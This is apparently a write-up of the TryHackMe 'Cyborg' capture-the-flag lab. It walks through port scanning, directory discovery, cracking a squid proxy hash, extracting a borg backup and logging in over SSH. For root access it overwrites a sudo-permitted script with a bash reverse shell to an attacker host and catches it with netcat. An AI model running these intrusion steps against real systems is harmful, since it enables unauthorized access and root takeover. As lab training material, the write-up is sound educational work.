Room Details

TryHackMe Cyborg room contains:

  • Service Discovery
  • Web Content Discovery
  • Hash Cracking
  • Data Decompression
  • Privilege Escalation

Target

  • IP: 10.10.230.194

Service Discovery

  • Scan for open ports with nmap
$ nmap -sC -sV -A -sS -Pn -oN nmap.txt 10.10.230.194
Nmap scan report for 10.10.230.194
Host is up (0.44s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=7/10%OT=22%CT=1%CU=35008%PV=Y%DS=4%DC=T%G=Y%TM=62CAA3E
OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M505ST11NW6%O2=M505ST11NW6%O3=M505NNT11NW6%O4=M505ST11NW6%O5=M505ST1
OS:1NW6%O6=M505ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN
OS:(R=Y%DF=Y%T=40%W=F507%O=M505NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 993/tcp)
HOP RTT       ADDRESS
1   279.37 ms 10.2.0.1
2   ... 3
4   514.99 ms 10.10.230.194

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  • Services Discovered

    Service Port Version
    HTTP 80 Apache 2.4.18
    SSH 22 OpenSSH 7.2p2
  • OS: Ubuntu from service description

  • Answer Task 2 first three questions

Web Content Discovery

  • Scan for directories using gobuster

    gobuster dir -u http://10.10.230.194 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 40 --no-error -o web-dirs.txt
    
  • Directories Discovered

Dirs Description Files Found
/admin homepage from archive dropdown found archive.tar file
/etc squid proxy squid password and configuration files

Analyzing Directories

  • From /etc found /etc/squid/passwd which contains password hash and squid config file /etc/squid/squid.conf

    # reading files
    
    # /etc/squid/passwd
    music_archive:{REDACTED}
    
    # /etc/squid/squid.conf
    auth_param basic program /usr/lib64/squid/basic_ncsa_auth /etc/squid/passwd
    auth_param basic children 5
    auth_param basic realm Squid Basic Authentication
    auth_param basic credentialsttl 2 hours
    acl auth_users proxy_auth REQUIRED
    http_access allow auth_users
    

Cracking Password Hash

  • Store hash into a file passwd_hash.txt

  • Crack the hash using hashcat

    john passwd_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
    

    squidward (music_archive)

  • We’ve successfully found the password from the hash

Analyzing Tar file

  • extract tar file

    tar -xvf archive.tar
    
  • Found readme file which leads us to the borg documentation page

  • We need to install borg to extract the files from the compressed format

  • Install borg

    sudo apt install borgbackup -y
    

    For debian based
    For other distribution refer borg installation documentation

  • decompress extracted files from archive.tar using borg

    borg extract ./home/field/dev/final_archive::music_archive
    
  • After files are decompressed successfully, it data turns out to the home directory backup for alex’s account

  • Found Password from /home/alex/Documents/note.txt

    Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!
    
    alex:{REDACTED}
    

Login with ssh

  • Login using alex’s

    ssh [email protected]
    [email protected] password: # enter password from note.txt
    Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)
    
    * Documentation: https://help.ubuntu.com
    * Management: https://landscape.canonical.com
    * Support: https://ubuntu.com/advantage
    
    27 packages can be updated.
    0 updates are security updates.
    
    The programs included with the Ubuntu system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    
    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
    applicable law.
    
    [email protected]:~$
    
    
  • We got access to Alex Account

Get User Flag

[email protected]:~$ cat user.txt
flag{REDACTED}

Privilege Escalation

  • Check for sudo exectuables

    [email protected]:~$ sudo -l
    Matching Defaults entries for alex on ubuntu:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    
    User alex may run the following commands on ubuntu:
        (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
    

    We can run file /etc/mp3backups/backup.sh as with root privileges

  • Check whether file is writable

    [email protected]:~$ ls -la /etc/mp3backups/backup.sh
    -r-xr-xr-- 1 alex alex 1083 Dec 30  2020 /etc/mp3backups/backup.sh
    

    We cannot write file, but user is alex, so we can change file permissions using chmod

  • Allow all permissions to the files

    [email protected]:~$ chmod 777 /etc/mp3backups/backup.sh
    

    Note: Allowing all users rwx permissions isn’t a good practice, but for ease, I’ve provided them rights

  • Overwrite file with Bash Reverse Shell on alex’s machine

    [email protected]:~$ echo "bash -c 'exec bash -i &>/dev/tcp/ATTACKER_THM_IP/4444 <&1'" > /etc/mp3backups/backup.sh
    

    Reverse shell will connect to attacker’s machine on port 4444

  • Start netcat on attacker’s machine

    nc -nlvp 4444
    
  • Execute bash script from target machine

    [email protected]:~$ sudo /etc/mp3backups/backup.sh
    
  • Now, we’ve successfully rooted the machine

    $ nc -nlvp 4444
    listening on [any] 4444 ...
    connect to [ATTACKER_THM_IP] from (UNKNOWN) [10.10.230.194] 36492
    [email protected]:~#
    

Get Root Flag

[email protected]:~# cat root.txt
flag{REDACTED}